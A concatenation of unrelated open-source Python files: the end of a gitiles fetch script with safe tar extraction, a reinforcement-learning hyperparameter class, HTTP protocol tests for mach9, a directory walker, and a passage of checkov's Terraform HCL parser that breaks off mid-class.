'fetched %d commits, next: %s.', len(commits),
last_result.get('next'))
return last_result
def main(arguments):
parser = create_argparser()
args = parser.parse_args(arguments)
if args.extract_to and args.format != "archive":
parser.error('--extract-to requires --format=archive')
if not args.extract_to and args.format == "archive":
parser.error('--format=archive requires --extract-to')
if args.extract_to:
# make sure it is absolute and ends with '/'
args.extract_to = os.path.join(os.path.abspath(args.extract_to), '')
os.makedirs(args.extract_to)
parsed_url = urlparse.urlparse(args.url)
if not parsed_url.scheme.startswith('http'):
parser.error('Invalid URI scheme (expected http or https): %s' % args.url)
query_params = {}
if parsed_url.query:
query_params.update(urlparse.parse_qs(parsed_url.query))
# Force the format specified on command-line.
if query_params.get('format'):
parser.error('URL must not contain format; use --format command line flag '
'instead.')
query_params['format'] = args.format
kwargs = {}
accept_statuses = frozenset([int(s) for s in args.accept_statuses.split(',')])
if accept_statuses:
kwargs['accept_statuses'] = accept_statuses
# Choose handler.
if args.format == 'json':
def handler(conn):
return ReadHttpJsonResponse(conn, **kwargs)
elif args.format == 'text':
# Text fetching will pack the text into structured JSON.
def handler(conn):
# Wrap in a structured JSON for export to recipe module.
return {
'value': ReadHttpResponse(conn, **kwargs).read() or None,
}
elif args.format == 'archive':
# Archive fetching hooks result to tarfile extraction. This implementation
# is able to do a streaming extraction operation without having to buffer
# the entire tarfile.
def handler(conn):
ret = {
'extracted': {
'filecount': 0,
'bytes': 0,
},
'skipped': {
'filecount': 0,
'bytes': 0,
'names': [],
}
}
fileobj = ReadHttpResponse(conn, **kwargs)
with tarfile.open(mode='r|*', fileobj=fileobj) as tf:
# monkeypatch the TarFile object to allow printing messages and
# collecting stats for each extracted file. extractall makes a single
# linear pass over the tarfile, which is compatible with
# ReadHttpResponse; other naive implementations (such as `getmembers`)
# do random access over the file and would require buffering the whole
# thing (!!).
em = tf._extract_member
def _extract_member(tarinfo, targetpath):
if not os.path.abspath(targetpath).startswith(args.extract_to):
print('Skipping %s' % (tarinfo.name,))
ret['skipped']['filecount'] += 1
ret['skipped']['bytes'] += tarinfo.size
ret['skipped']['names'].append(tarinfo.name)
return
print('Extracting %s' % (tarinfo.name,))
ret['extracted']['filecount'] += 1
ret['extracted']['bytes'] += tarinfo.size
return em(tarinfo, targetpath)
tf._extract_member = _extract_member
tf.extractall(args.extract_to)
return ret
if args.log_start:
query_params['s'] = args.log_start
def fetch(query_params):
parsed_url_with_query = reparse_url(parsed_url, query_params)
result = gitiles_get(parsed_url_with_query, handler, args.attempts)
if not args.quiet:
logging.info('Read from %s: %s', parsed_url_with_query.geturl(), result)
return result
if args.log_limit:
if args.format != 'json':
parser.error('--log-limit works with json format only')
result = fetch_log_with_paging(query_params, args.log_limit, fetch)
else:
# Either not a log request, or don't care about paging.
# So, just return whatever is fetched the first time.
result = fetch(query_params)
with open(args.json_file, 'w') as json_file:
json.dump(result, json_file)
return 0
def create_argparser():
parser = argparse.ArgumentParser()
parser.add_argument(
'-j', '--json-file',
help='Path to json file for output.')
parser.add_argument(
'--extract-to',
help='Local path to extract archive url. Must not exist.')
parser.add_argument(
'-f', '--format', required=True, choices=('json', 'text', 'archive'))
parser.add_argument(
'-u', '--url', required=True,
help='Url of gitiles. For example, '
'https://chromium.googlesource.com/chromium/src/+refs. '
'Insert a/ after domain for authenticated access.')
parser.add_argument(
'-a', '--attempts', type=int, default=1,
help='The number of attempts to make (with exponential backoff) before '
'failing. If several requests are to be made, applies per each '
'request separately.')
parser.add_argument(
'-q', '--quiet', action='store_true',
help='Suppress file contents logging output.')
parser.add_argument(
'--log-limit', type=int, default=None,
help='Follow gitiles pages to fetch at least this many commits. By '
'default, first page with unspecified number of commits is fetched. '
'Only for https://<hostname>/<repo>/+log/... gitiles request.')
parser.add_argument(
'--log-start',
help='If given, continue fetching log by paging from this commit hash. '
'This value can be typically be taken from json result of previous '
'call to log, which returns next page start commit as "next" key. '
'Only for https://<hostname>/<repo>/+log/... gitiles request.')
parser.add_argument(
'--accept-statuses', type=str, default='200',
help='Comma-separated list of Status codes to accept as "successful" '
'HTTP responses.')
return parser
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
sys.exit(main(sys.argv[1:]))
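# Usage sketch (illustrative only): follow gitiles paging until at least 200
# commits have been collected; the URL and output path are hypothetical.
#
#   ./gerrit_client.py -j /tmp/log.json -f json --log-limit 200 \
#       -u https://chromium.googlesource.com/chromium/src/+log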
|
the-stack_106_22151
|
class Hyperparameters():
def __init__(self):
self.IMAGESIZE = [30,30]
self.MEAN_REWARD_BOUND = 19.0
self.CHANNEL_NUM = 4
self.ACTION_SPACE = 6
self.GAMMA = 0.99
self.BATCH_SIZE = 32
self.REPLAY_SIZE = 10000
self.REPLAY_START_SIZE = 10000
self.LEARING_RATE = 1e-4 *1
self.SYNC_TARGET_FRAMES = 1000
######################################
self.EPS_INITIAL = 1.0
self.FIXED_EPSILON = 0.8
self.THRESH_START_DECAY = 20
self.EPS_DECAY = 0.99
self.EPS_MIN = 0.02
######################################
self.ITER_NUM = 80
self.EPISODE_NUM = 500
self.ITER_SUCCESS_FILL = 100
|
the-stack_106_22152
|
import pytest
from mach9.http import HttpProtocol, BodyChannel
from tests.utils import Transport
@pytest.mark.asyncio
async def test_body_channel_send():
transport = Transport()
body_channel = BodyChannel(transport)
i = 1
await body_channel.send(i)
o = await body_channel.receive()
assert i == o
def test_check_headers():
protocol = HttpProtocol(loop=None, request_handler=None)
result_headers = protocol.check_headers([])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is False
result_headers = protocol.check_headers([
[b'Connection', b'close'],
[b'Content-Length', b'1'],
])
assert result_headers['connection_close'] is True
assert result_headers['content_length'] is True
result_headers = protocol.check_headers([
[b'Connection', b'__close'],
[b'_Content-Length', b'1'],
])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is False
result_headers = protocol.check_headers([
[b'__Connection', b'close'],
[b'Content-Length', b'1'],
])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is True
def test_is_reponse_chunk():
protocol = HttpProtocol(loop=None, request_handler=None)
result = protocol.is_response_chunk({'a': 1})
assert result is True
result = protocol.is_response_chunk({'status': 1})
assert result is False
result = protocol.is_response_chunk({'headers': 1})
assert result is False
result = protocol.is_response_chunk({'status': 1, 'headers': 1})
assert result is False
def test_make_header_content():
protocol = HttpProtocol(loop=None, request_handler=None)
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
None, result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[], result_headers, b'123', False)
assert header_content == b'Content-Length: 3\r\n'
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[], result_headers, b'123', True)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': True
}
header_content = protocol.make_header_content(
[], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': True,
'content_length': True
}
header_content = protocol.make_header_content(
[[b'Connection', b'1']], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': True
}
header_content = protocol.make_header_content(
[[b'Connection', b'1']], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[[b'foo', b'bar']], result_headers, b'123', False)
assert header_content == b'Content-Length: 3\r\nfoo: bar\r\n'
def get_request_body_chunk():
http_protocol = HttpProtocol(loop=None, request_handler=None,)
message = http_protocol.get_request_body_chunk(b'foo', False, True)
message['content'] = b'foo'
message['closed'] = False
message['more_content'] = True
def test_get_message():
http_protocol = HttpProtocol(loop=None, request_handler=None)
transport = Transport()
message = http_protocol.get_message(
transport,
'1.1',
b'GET',
b'http://127.0.0.1:1234/foo/bar?key1=1&key2=2',
[[b'k1', b'v1']])
assert message['channel'] == 'http.request'
assert message['reply_channel'] is None
assert message['http_version'] == '1.1'
assert message['method'] == 'GET'
assert message['scheme'] == 'http'
assert message['query_string'] == b'key1=1&key2=2'
assert message['root_path'] == ''
assert message['headers'] == [[b'k1', b'v1']]
assert message['body'] == b''
assert message['body_channel'] is None
assert message['client'] == ('127.0.0.1', 1234)
assert message['server'] == ('127.0.0.1', 5678)
|
the-stack_106_22153
|
import os
def WalkFileStructure(curDir, callback, reportFiles = True, reportFolders = True):
for name in os.listdir(curDir):
if name.startswith("."):
continue
fullPath = os.path.join(curDir, name)
if (reportFiles and os.path.isfile(fullPath)) or (reportFolders and os.path.isdir(fullPath)):
if not callback(curDir, name):
return False
if os.path.isdir(fullPath):
if not WalkFileStructure(fullPath, callback, reportFiles, reportFolders):
return False
return True
def BuildFileDictionary(dir):
nameToPath = {}
def foundPath(parentDir: str, name: str):
if not name.endswith(".md") and not name.endswith(".jpg") and not name.endswith(".png"):
return True
fullPath = os.path.join(parentDir, name)
if name in nameToPath:
print(f"Error: File name is not unique: '{name}' - {fullPath}")
#return False
nameToPath[name] = fullPath
return True
WalkFileStructure(dir, foundPath, reportFolders=False)
return nameToPath
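

# Illustrative usage sketch (not part of the original module); "." is only a
# placeholder directory and printPath is a hypothetical callback.
if __name__ == "__main__":
    def printPath(parentDir, name):
        # Print every reported file and keep walking.
        print(os.path.join(parentDir, name))
        return True

    WalkFileStructure(".", printPath, reportFolders=False)
    print(BuildFileDictionary("."))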
|
the-stack_106_22155
|
import datetime
import json
import logging
import os
import re
from copy import deepcopy
from json import dumps, loads, JSONEncoder
from pathlib import Path
from typing import Optional, Dict, Mapping, Set, Tuple, Callable, Any, List, Type
import deep_merge
import hcl2
from lark import Tree
from checkov.common.parallelizer.parallel_runner import parallel_runner
from checkov.common.runners.base_runner import filter_ignored_paths
from checkov.common.util.config_utils import should_scan_hcl_files
from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR, RESOLVED_MODULE_ENTRY_NAME
from checkov.common.variables.context import EvaluationContext
from checkov.terraform.checks.utils.dependency_path_handler import unify_dependency_path
from checkov.terraform.graph_builder.graph_components.block_types import BlockType
from checkov.terraform.graph_builder.graph_components.module import Module
from checkov.terraform.graph_builder.utils import remove_module_dependency_in_path
from checkov.terraform.module_loading.content import ModuleContent
from checkov.terraform.module_loading.module_finder import load_tf_modules
from checkov.terraform.module_loading.registry import module_loader_registry as default_ml_registry, \
ModuleLoaderRegistry
from checkov.terraform.parser_utils import eval_string, find_var_blocks
external_modules_download_path = os.environ.get('EXTERNAL_MODULES_DIR', DEFAULT_EXTERNAL_MODULES_DIR)
class DefinitionsEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
elif isinstance(obj, Tree):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
return super().default(obj)
def _filter_ignored_paths(root, paths, excluded_paths):
filter_ignored_paths(root, paths, excluded_paths)
[paths.remove(path) for path in list(paths) if path in [default_ml_registry.external_modules_folder_name]]
class Parser:
def __init__(self, module_class: Type[Module] = Module):
self.module_class = module_class
self._parsed_directories = set()
self.external_modules_source_map: Dict[Tuple[str, str], str] = {}
self.module_address_map: Dict[Tuple[str, str], str] = {}
# This ensures that we don't try to double-load modules
# Tuple is <file>, <module_index>, <name> (see _load_modules)
self._loaded_modules: Set[Tuple[str, int, str]] = set()
self.external_variables_data = []
def _init(self, directory: str, out_definitions: Optional[Dict],
out_evaluations_context: Dict[str, Dict[str, EvaluationContext]],
out_parsing_errors: Dict[str, Exception],
env_vars: Mapping[str, str],
download_external_modules: bool,
external_modules_download_path: str,
excluded_paths: Optional[List[str]] = None,
tf_var_files: Optional[List[str]] = None):
self.directory = directory
self.out_definitions = out_definitions
self.out_evaluations_context = out_evaluations_context
self.out_parsing_errors = out_parsing_errors
self.env_vars = env_vars
self.download_external_modules = download_external_modules
self.external_modules_download_path = external_modules_download_path
self.external_modules_source_map = {}
self.module_address_map = {}
self.tf_var_files = tf_var_files
self.scan_hcl = should_scan_hcl_files()
if self.out_evaluations_context is None:
self.out_evaluations_context = {}
if self.out_parsing_errors is None:
self.out_parsing_errors = {}
if self.env_vars is None:
self.env_vars = dict(os.environ)
self.excluded_paths = excluded_paths
def _check_process_dir(self, directory):
if directory not in self._parsed_directories:
self._parsed_directories.add(directory)
return True
else:
return False
def parse_directory(self, directory: str, out_definitions: Optional[Dict],
out_evaluations_context: Dict[str, Dict[str, EvaluationContext]] = None,
out_parsing_errors: Dict[str, Exception] = None,
env_vars: Mapping[str, str] = None,
download_external_modules: bool = False,
external_modules_download_path: str = DEFAULT_EXTERNAL_MODULES_DIR,
excluded_paths: Optional[List[str]] = None,
vars_files: Optional[List[str]] = None,
external_modules_content_cache: Optional[Dict[str, ModuleContent]] = None):
self._init(directory, out_definitions, out_evaluations_context, out_parsing_errors, env_vars,
download_external_modules, external_modules_download_path, excluded_paths)
self._parsed_directories.clear()
default_ml_registry.root_dir = directory
default_ml_registry.download_external_modules = download_external_modules
default_ml_registry.external_modules_folder_name = external_modules_download_path
default_ml_registry.module_content_cache = external_modules_content_cache if external_modules_content_cache else {}
load_tf_modules(directory)
self._parse_directory(dir_filter=lambda d: self._check_process_dir(d), vars_files=vars_files)
def parse_file(self, file: str, parsing_errors: Dict[str, Exception] = None, scan_hcl = False) -> Optional[Dict]:
if file.endswith(".tf") or file.endswith(".tf.json") or (scan_hcl and file.endswith(".hcl")):
parse_result = _load_or_die_quietly(Path(file), parsing_errors)
if parse_result:
parse_result = self._serialize_definitions(parse_result)
parse_result = self._clean_parser_types(parse_result)
return parse_result
else:
return None
def _parse_directory(self, include_sub_dirs: bool = True,
module_loader_registry: ModuleLoaderRegistry = default_ml_registry,
dir_filter: Callable[[str], bool] = lambda _: True,
vars_files: Optional[List[str]] = None):
"""
Load and resolve configuration files starting in the given directory, merging the
resulting data into `tf_definitions`. This loads data according to the Terraform Code Organization
specification (https://www.terraform.io/docs/configuration/index.html#code-organization), starting
in the given directory and possibly moving out from there.
The resulting data dictionary generally follows the layout of HCL parsing with a couple distinctions:
- Data is broken out by file from which the data was loaded. So: <file>: <data>
- Loaded modules will also be keyed by referrer info: <file>[<referring_file>#<index>]: <data>
        - Module blocks will include a "__resolved__" key with a list of the file/referrer names under
which data for the file was loaded. For example: "__resolved__": ["main.tf#0"]. The values will
correspond to the file names mentioned in the first bullet.
- All variables that can be resolved will be resolved.
:param include_sub_dirs: If true, subdirectories will be walked.
:param module_loader_registry: Registry used for resolving modules. This allows customization of how
much resolution is performed (and easier testing) by using a manually
constructed registry rather than the default.
:param dir_filter: Determines whether or not a directory should be processed. Returning
True will allow processing. The argument will be the absolute path of
the directory.
"""
keys_referenced_as_modules: Set[str] = set()
if include_sub_dirs:
for sub_dir, d_names, f_names in os.walk(self.directory):
# filter subdirectories for future iterations (we filter files while iterating the directory)
_filter_ignored_paths(sub_dir, d_names, self.excluded_paths)
if dir_filter(os.path.abspath(sub_dir)):
self._internal_dir_load(sub_dir, module_loader_registry, dir_filter,
keys_referenced_as_modules, vars_files=vars_files,
root_dir=self.directory, excluded_paths=self.excluded_paths)
else:
self._internal_dir_load(self.directory, module_loader_registry, dir_filter,
keys_referenced_as_modules, vars_files=vars_files)
# Ensure anything that was referenced as a module is removed
for key in keys_referenced_as_modules:
if key in self.out_definitions:
del self.out_definitions[key]
def _internal_dir_load(self, directory: str,
module_loader_registry: ModuleLoaderRegistry,
dir_filter: Callable[[str], bool],
keys_referenced_as_modules: Set[str],
specified_vars: Optional[Mapping[str, str]] = None,
module_load_context: Optional[str] = None,
vars_files: Optional[List[str]] = None,
root_dir: Optional[str] = None,
excluded_paths: Optional[List[str]] = None):
"""
See `parse_directory` docs.
:param directory: Directory in which .tf and .tfvars files will be loaded.
:param module_loader_registry: Registry used for resolving modules. This allows customization of how
much resolution is performed (and easier testing) by using a manually
constructed registry rather than the default.
:param dir_filter: Determines whether or not a directory should be processed. Returning
True will allow processing. The argument will be the absolute path of
the directory.
:param specified_vars: Specifically defined variable values, overriding values from any other source.
"""
# Stage 1: Look for applicable files in the directory:
# https://www.terraform.io/docs/configuration/index.html#code-organization
# Load the raw data for non-variable files, but perform no processing other than loading
# variable default values.
# Variable files are also flagged for later processing.
var_value_and_file_map: Dict[str, Tuple[Any, str]] = {}
hcl_tfvars: Optional[os.DirEntry] = None
json_tfvars: Optional[os.DirEntry] = None
auto_vars_files: List[os.DirEntry] = [] # *.auto.tfvars / *.auto.tfvars.json
explicit_var_files: List[os.DirEntry] = [] # files passed with --var-file; only process the ones that are in this directory
dir_contents = list(os.scandir(directory))
if excluded_paths:
filter_ignored_paths(root_dir, dir_contents, excluded_paths)
tf_files_to_load = []
for file in dir_contents:
# Ignore directories and hidden files
try:
if not file.is_file() or file.name.startswith("."):
continue
except OSError:
# Skip files that can't be accessed
continue
# Variable files
# See: https://www.terraform.io/docs/configuration/variables.html#variable-definitions-tfvars-files
if file.name == "terraform.tfvars.json":
json_tfvars = file
elif file.name == "terraform.tfvars":
hcl_tfvars = file
elif file.name.endswith(".auto.tfvars.json") or file.name.endswith(".auto.tfvars"):
auto_vars_files.append(file)
elif vars_files and file.path in vars_files:
explicit_var_files.append(file)
# Resource files
elif file.name.endswith(".tf") or (self.scan_hcl and file.name.endswith('.hcl')): # TODO: add support for .tf.json
tf_files_to_load.append(file)
files_to_data = self._load_files(tf_files_to_load)
for file, data in sorted(files_to_data, key=lambda x: x[0]):
if not data:
continue
self.out_definitions[file] = data
# Load variable defaults
# (see https://www.terraform.io/docs/configuration/variables.html#declaring-an-input-variable)
var_blocks = data.get("variable")
if var_blocks and isinstance(var_blocks, list):
for var_block in var_blocks:
if not isinstance(var_block, dict):
continue
for var_name, var_definition in var_block.items():
if not isinstance(var_definition, dict):
continue
default_value = var_definition.get("default")
if default_value is not None and isinstance(default_value, list):
self.external_variables_data.append((var_name, default_value[0], file))
var_value_and_file_map[var_name] = default_value[0], file
# Stage 2: Load vars in proper order:
# https://www.terraform.io/docs/configuration/variables.html#variable-definition-precedence
# Defaults are loaded in stage 1.
# Then loading in this order with later taking precedence:
# - Environment variables
# - The terraform.tfvars file, if present.
# - The terraform.tfvars.json file, if present.
# - Any *.auto.tfvars or *.auto.tfvars.json files, processed in lexical order of
# their filenames.
        # Overriding everything else, variables from `specified_vars`, which are considered
# directly set.
for key, value in self.env_vars.items(): # env vars
if not key.startswith("TF_VAR_"):
continue
var_value_and_file_map[key[7:]] = value, f"env:{key}"
self.external_variables_data.append((key[7:], value, f"env:{key}"))
if hcl_tfvars: # terraform.tfvars
data = _load_or_die_quietly(hcl_tfvars, self.out_parsing_errors, clean_definitions=False)
if data:
var_value_and_file_map.update({k: (_safe_index(v, 0), hcl_tfvars.path) for k, v in data.items()})
self.external_variables_data.extend([(k, _safe_index(v, 0), hcl_tfvars.path) for k, v in data.items()])
if json_tfvars: # terraform.tfvars.json
data = _load_or_die_quietly(json_tfvars, self.out_parsing_errors)
if data:
var_value_and_file_map.update({k: (v, json_tfvars.path) for k, v in data.items()})
self.external_variables_data.extend([(k, v, json_tfvars.path) for k, v in data.items()])
auto_var_files_to_data = self._load_files(auto_vars_files)
for var_file, data in sorted(auto_var_files_to_data, key=lambda x: x[0]):
if data:
var_value_and_file_map.update({k: (v, var_file) for k, v in data.items()})
self.external_variables_data.extend([(k, v, var_file) for k, v in data.items()])
explicit_var_files_to_data = self._load_files(explicit_var_files)
# it's possible that os.scandir returned the var files in a different order than they were specified
for var_file, data in sorted(explicit_var_files_to_data, key=lambda x: vars_files.index(x[0])):
if data:
var_value_and_file_map.update({k: (v, var_file) for k, v in data.items()})
self.external_variables_data.extend([(k, v, var_file) for k, v in data.items()])
if specified_vars: # specified
var_value_and_file_map.update({k: (v, "manual specification") for k, v in specified_vars.items()})
self.external_variables_data.extend([(k, v, "manual specification") for k, v in specified_vars.items()])
# IMPLEMENTATION NOTE: When resolving `module.` references, access to the entire data map is needed. It
# may be a little overboard, but I don't want to just pass the entire data map down
        # because it breaks encapsulation and I don't want to cause confusion about what data
        # set is being processed. To avoid this, here's a Callable that will get the data
# map for a particular module reference. (Might be OCD, but...)
module_data_retrieval = lambda module_ref: self.out_definitions.get(module_ref)
# Stage 4: Load modules
# This stage needs to be done in a loop (again... alas, no DAG) because modules might not
# be loadable until other modules are loaded. This happens when parameters to one module
# depend on the output of another. For such cases, the base module must be loaded, then
# a parameter resolution pass needs to happen, then the second module can be loaded.
#
# One gotcha is that we need to make sure we load all modules at some point, even if their
# parameters don't resolve. So, if we hit a spot where resolution doesn't change anything
# and there are still modules to be loaded, they will be forced on the next pass.
force_final_module_load = False
for i in range(0, 10): # circuit breaker - no more than 10 loops
logging.debug("Module load loop %d", i)
# Stage 4a: Load eligible modules
has_more_modules = self._load_modules(directory, module_loader_registry,
dir_filter, module_load_context,
keys_referenced_as_modules,
force_final_module_load)
# Stage 4b: Variable resolution round 2 - now with (possibly more) modules
made_var_changes = False
if not has_more_modules:
break # nothing more to do
elif not made_var_changes:
                # If there are more modules to load but no variables were resolved, then do a final module
# load, forcing things through without complete resolution.
force_final_module_load = True
def _load_files(self, files):
def _load_file(file):
parsing_errors = {}
result = _load_or_die_quietly(file, parsing_errors)
            # the exception types can be un-pickleable
for path, e in parsing_errors.items():
parsing_errors[path] = Exception(str(e))
return (file.path, result), parsing_errors
results = parallel_runner.run_function(_load_file, files)
files_to_data = []
for result, parsing_errors in results:
self.out_parsing_errors.update(parsing_errors)
files_to_data.append(result)
return files_to_data
def _load_modules(self, root_dir: str, module_loader_registry: ModuleLoaderRegistry,
dir_filter: Callable[[str], bool], module_load_context: Optional[str],
keys_referenced_as_modules: Set[str], ignore_unresolved_params: bool = False) -> bool:
"""
Load modules which have not already been loaded and can be loaded (don't have unresolved parameters).
:param ignore_unresolved_params: If true, not-yet-loaded modules will be loaded even if they are
passed parameters that are not fully resolved.
:return: True if there were modules that were not loaded due to unresolved
parameters.
"""
all_module_definitions = {}
all_module_evaluations_context = {}
skipped_a_module = False
for file in list(self.out_definitions.keys()):
# Don't process a file in a directory other than the directory we're processing. For example,
# if we're down dealing with <top_dir>/<module>/something.tf, we don't want to rescan files
# up in <top_dir>.
if os.path.dirname(file) != root_dir:
continue
# Don't process a file reference which has already been processed
if file.endswith("]"):
continue
file_data = self.out_definitions.get(file)
if file_data is None:
continue
module_calls = file_data.get("module")
if not module_calls or not isinstance(module_calls, list):
continue
for module_index, module_call in enumerate(module_calls):
if not isinstance(module_call, dict):
continue
# There should only be one module reference per outer dict, but... safety first
for module_call_name, module_call_data in module_call.items():
if not isinstance(module_call_data, dict):
continue
module_address = (file, module_index, module_call_name)
if module_address in self._loaded_modules:
continue
# Variables being passed to module, "source" and "version" are reserved
specified_vars = {k: v[0] if isinstance(v, list) else v for k, v in module_call_data.items()
if k != "source" and k != "version"}
if not ignore_unresolved_params:
has_unresolved_params = False
for k, v in specified_vars.items():
if not is_acceptable_module_param(v) or not is_acceptable_module_param(k):
has_unresolved_params = True
break
if has_unresolved_params:
skipped_a_module = True
continue
self._loaded_modules.add(module_address)
source = module_call_data.get("source")
if not source or not isinstance(source, list):
continue
source = source[0]
if not isinstance(source, str):
logging.debug(f"Skipping loading of {module_call_name} as source is not a string, it is: {source}")
continue
# Special handling for local sources to make sure we aren't double-parsing
if source.startswith("./") or source.startswith("../"):
source = os.path.normpath(
os.path.join(os.path.dirname(_remove_module_dependency_in_path(file)), source))
version = module_call_data.get("version", "latest")
if version and isinstance(version, list):
version = version[0]
try:
content = module_loader_registry.load(root_dir, source, version)
if not content.loaded():
logging.info(f'Got no content for {source}:{version}')
continue
self._internal_dir_load(directory=content.path(),
module_loader_registry=module_loader_registry,
dir_filter=dir_filter, specified_vars=specified_vars,
module_load_context=module_load_context,
keys_referenced_as_modules=keys_referenced_as_modules)
module_definitions = {path: self.out_definitions[path] for path in
list(self.out_definitions.keys()) if
os.path.dirname(path) == content.path()}
if not module_definitions:
continue
# NOTE: Modules are put into the main TF definitions structure "as normal" with the
# notable exception of the file name. For loaded modules referrer information is
# appended to the file name to create this format:
# <file_name>[<referred_file>#<referrer_index>]
# For example:
# /the/path/module/my_module.tf[/the/path/main.tf#0]
                        # The referrer and index allow a module to be loaded multiple
# times with differing data.
#
# In addition, the referring block will have a "__resolved__" key added with a
# list pointing to the location of the module data that was resolved. For example:
# "__resolved__": ["/the/path/module/my_module.tf[/the/path/main.tf#0]"]
resolved_loc_list = module_call_data.get(RESOLVED_MODULE_ENTRY_NAME)
if resolved_loc_list is None:
resolved_loc_list = []
module_call_data[RESOLVED_MODULE_ENTRY_NAME] = resolved_loc_list
# NOTE: Modules can load other modules, so only append referrer information where it
# has not already been added.
keys = list(module_definitions.keys())
for key in keys:
if key.endswith("]") or file.endswith("]"):
continue
keys_referenced_as_modules.add(key)
new_key = f"{key}[{file}#{module_index}]"
module_definitions[new_key] = module_definitions[key]
del module_definitions[key]
del self.out_definitions[key]
if new_key not in resolved_loc_list:
resolved_loc_list.append(new_key)
if (file, module_call_name) not in self.module_address_map:
self.module_address_map[(file, module_call_name)] = str(module_index)
resolved_loc_list.sort() # For testing, need predictable ordering
if all_module_definitions:
deep_merge.merge(all_module_definitions, module_definitions)
else:
all_module_definitions = module_definitions
self.external_modules_source_map[(source, version)] = content.path()
except Exception as e:
logging.warning("Unable to load module (source=\"%s\" version=\"%s\"): %s",
source, version, e)
if all_module_definitions:
deep_merge.merge(self.out_definitions, all_module_definitions)
if all_module_evaluations_context:
deep_merge.merge(self.out_evaluations_context, all_module_evaluations_context)
return skipped_a_module
def parse_hcl_module(
self,
source_dir: str,
source: str,
download_external_modules: bool = False,
external_modules_download_path: str = DEFAULT_EXTERNAL_MODULES_DIR,
parsing_errors: Optional[Dict[str, Exception]] = None,
excluded_paths: Optional[List[str]] = None,
vars_files: Optional[List[str]] = None,
external_modules_content_cache: Optional[Dict[str, ModuleContent]] = None
) -> Tuple[Module, Dict[str, Dict[str, Any]]]:
tf_definitions: Dict[str, Dict[str, Any]] = {}
self.parse_directory(directory=source_dir, out_definitions=tf_definitions, out_evaluations_context={},
out_parsing_errors=parsing_errors if parsing_errors is not None else {},
download_external_modules=download_external_modules,
external_modules_download_path=external_modules_download_path, excluded_paths=excluded_paths,
vars_files=vars_files, external_modules_content_cache=external_modules_content_cache)
tf_definitions = self._clean_parser_types(tf_definitions)
tf_definitions = self._serialize_definitions(tf_definitions)
module, tf_definitions = self.parse_hcl_module_from_tf_definitions(tf_definitions, source_dir, source)
return module, tf_definitions
def parse_hcl_module_from_tf_definitions(
self,
tf_definitions: Dict[str, Dict[str, Any]],
source_dir: str,
source: str,
) -> Tuple[Module, Dict[str, Dict[str, Any]]]:
module_dependency_map, tf_definitions, dep_index_mapping = self.get_module_dependency_map(tf_definitions)
module = self.get_new_module(
source_dir=source_dir,
module_dependency_map=module_dependency_map,
module_address_map=self.module_address_map,
external_modules_source_map=self.external_modules_source_map,
dep_index_mapping=dep_index_mapping,
)
self.add_tfvars(module, source)
copy_of_tf_definitions = deepcopy(tf_definitions)
for file_path, blocks in copy_of_tf_definitions.items():
for block_type in blocks:
try:
module.add_blocks(block_type, blocks[block_type], file_path, source)
except Exception as e:
logging.error(f'Failed to add block {blocks[block_type]}. Error:')
logging.error(e, exc_info=True)
return module, tf_definitions
@staticmethod
def _clean_parser_types(conf: dict) -> dict:
sorted_keys = list(conf.keys())
if len(conf.keys()) > 0 and all(isinstance(x, type(list(conf.keys())[0])) for x in conf.keys()):
sorted_keys = sorted(filter(lambda x: x is not None, conf.keys()))
# Create a new dict where the keys are sorted alphabetically
sorted_conf = {key: conf[key] for key in sorted_keys}
for attribute, values in sorted_conf.items():
if attribute == 'alias':
continue
if isinstance(values, list):
sorted_conf[attribute] = Parser._clean_parser_types_lst(values)
elif isinstance(values, dict):
sorted_conf[attribute] = Parser._clean_parser_types(conf[attribute])
elif isinstance(values, str) and values in ('true', 'false'):
sorted_conf[attribute] = True if values == 'true' else False
elif isinstance(values, set):
sorted_conf[attribute] = Parser._clean_parser_types_lst(list(values))
elif isinstance(values, Tree):
sorted_conf[attribute] = str(values)
return sorted_conf
@staticmethod
def _clean_parser_types_lst(values: list) -> list:
for i in range(len(values)):
val = values[i]
if isinstance(val, dict):
values[i] = Parser._clean_parser_types(val)
elif isinstance(val, list):
values[i] = Parser._clean_parser_types_lst(val)
elif isinstance(val, str):
if val == 'true':
values[i] = True
elif val == 'false':
values[i] = False
elif isinstance(val, set):
values[i] = Parser._clean_parser_types_lst(list(val))
str_values_in_lst = [val for val in values if isinstance(val, str)]
str_values_in_lst.sort()
result_values = [val for val in values if not isinstance(val, str)]
result_values.extend(str_values_in_lst)
return result_values
@staticmethod
def _serialize_definitions(tf_definitions):
return loads(dumps(tf_definitions, cls=DefinitionsEncoder))
@staticmethod
def get_next_vertices(evaluated_files: list, unevaluated_files: list) -> (list, list):
"""
This function implements a lazy separation of levels for the evaluated files. It receives the evaluated
files, and returns 2 lists:
1. The next level of files - files from the unevaluated_files which have no unresolved dependency (either
no dependency or all dependencies were evaluated).
2. unevaluated - files which have yet to be evaluated, and still have pending dependencies
Let's say we have this dependency tree:
a -> b
x -> b
y -> c
z -> b
b -> c
c -> d
The first run will return [a, y, x, z] as the next level since all of them have no dependencies
The second run with the evaluated being [a, y, x, z] will return [b] as the next level.
Please mind that [c] has some resolved dependencies (from y), but has unresolved dependencies from [b].
The third run will return [c], and the fourth will return [d].
"""
next_level, unevaluated, do_not_eval_yet = [], [], []
for key in unevaluated_files:
found = False
for eval_key in evaluated_files:
if eval_key in key:
found = True
break
if not found:
do_not_eval_yet.append(key.split('[')[0])
unevaluated.append(key)
else:
next_level.append(key)
move_to_uneval = list(filter(lambda k: k.split('[')[0] in do_not_eval_yet, next_level))
for k in move_to_uneval:
next_level.remove(k)
unevaluated.append(k)
return next_level, unevaluated
@staticmethod
